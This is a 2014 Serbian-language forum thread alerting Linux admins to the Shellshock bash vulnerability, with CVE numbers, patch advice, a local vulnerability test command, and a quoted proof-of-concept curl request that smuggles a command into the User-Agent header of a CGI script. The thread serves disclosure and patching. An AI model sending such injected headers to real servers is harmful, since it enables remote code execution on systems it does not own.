MyCity » Zaštita od zlonamernih programa -> Propusti i ažuriranja » Shellsock - bash remote code execution

Shellsock - bash remote code execution

Napisano na dan: 25.9.2014

Shellsock - bash remote code execution
Sledeća strana Pagination

Idi na vrh

Poslao: 25 Sep 2014 15:52
Idi na vrh
offline
  • Pridružio: 26 Avg 2005
  • Poruke: 384
  • Gde živiš: Beograd

Samo malo obavestenje za sve Linux admine juce je otkriveno da su sve verzije bash-a ranjive. Update jako preporucljiv.
Vise info-a
https://securityblog.redhat.com/2014/09/24/bash-sp.....on-attack/
random primer sa neta:


[root@host cgi-bin]# rm -fr /tmp/aa
[root@host cgi-bin]# cat /var/www/cgi-bin/hi
#!/bin/bash
echo "Content-type: text/html"
echo ""
echo "hai"
[root@host cgi-bin]# curl -k -H 'User-Agent: () { :;}; echo aa>/tmp/aa'  https://localhost/cgi-bin/hi
hai
[root@host cgi-bin]#  tail -n1 /var/log/httpd/ssl_access_log
::1 - - [24/Sep/2014:18:22:05 +0200] "GET /cgi-bin/hi HTTP/1.1" 200 4 "-" "() { :;}; echo aa>/tmp/aa"
[root@host cgi-bin]#  ls -l /tmp/aa
-rw-r--r--. 1 apache apache 3 24 sept. 18:22 /tmp/aa



Registruj se da bi učestvovao u diskusiji. Registrovanim korisnicima se NE prikazuju reklame unutar poruka.
Poslao: 28 Sep 2014 08:56
Idi na vrh
offline
  • Pridružio: 17 Jan 2014
  • Poruke: 573
  • Gde živiš: Ulm , Germany

Napisano: 26 Sep 2014 14:20

pogodjeni su i osx i uniix systemi sa ovim
kod ubuntu-a (svih verzija) fix ce biti implementiran putem redovnog update-a
inace, ova "rupa" je prisutna vec duzi niz godina ali opet je tesko koristiti dati propust jer korisnik sam mora da napravi fajl u /var folderu

Dopuna: 28 Sep 2014 8:55

test komanda za proveru je:
 env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
postoje 4 ranjivost koje su javne i jedna koja se tek utvrdjuje.
CVE-2014-6271
CVE-2014-7169
CVE-2014-7186
CVE-2014-7187

CVE-2014-6277

detaljniji test vrsi skripta:
script by hannob

ne bi bilo lose da OP promeni naziv teme u #shellsock ili #bashbug



Poslao: 28 Sep 2014 09:18
Idi na vrh
offline
  • bocke  Male
  • Moderator foruma
  • Glavni moderator Linux foruma
  • Veliki Pingvin
  • Guru
  • Pridružio: 16 Dec 2005
  • Poruke: 12488
  • Gde živiš: Južni pol

Pošto imamo forum koji se malo ozbiljnije bavi propustima, premeštam temu tamo.

MyCity » Zaštita od zlonamernih programa -> Propusti i ažuriranja » Shellsock - bash remote code execution

Ko je trenutno na forumu
 

Ukupno su 1229 korisnika na forumu :: 38 registrovanih, 8 sakrivenih i 1183 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 3466 - dana 01 Jun 2021 17:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: amaterSRB, amstel, Areal84, armor, babaroga, Brana01, BraneS, CheefCoach, Dannyboy, DPera, DragoslavS, elenemste, Georgius, havoc995, Karla, kobaja77, Luka Blažević, mikrimaus, moldway, nemkea71, NoOneEver Dreams, Oscar, ozzy, pein, procesor, rasok, repac, sasa87, Skywhaler, sokars, sombrero, vathra, Vatreni Zmaj, Vlad000, Vlada1389, Webb, zdrebac, žeks62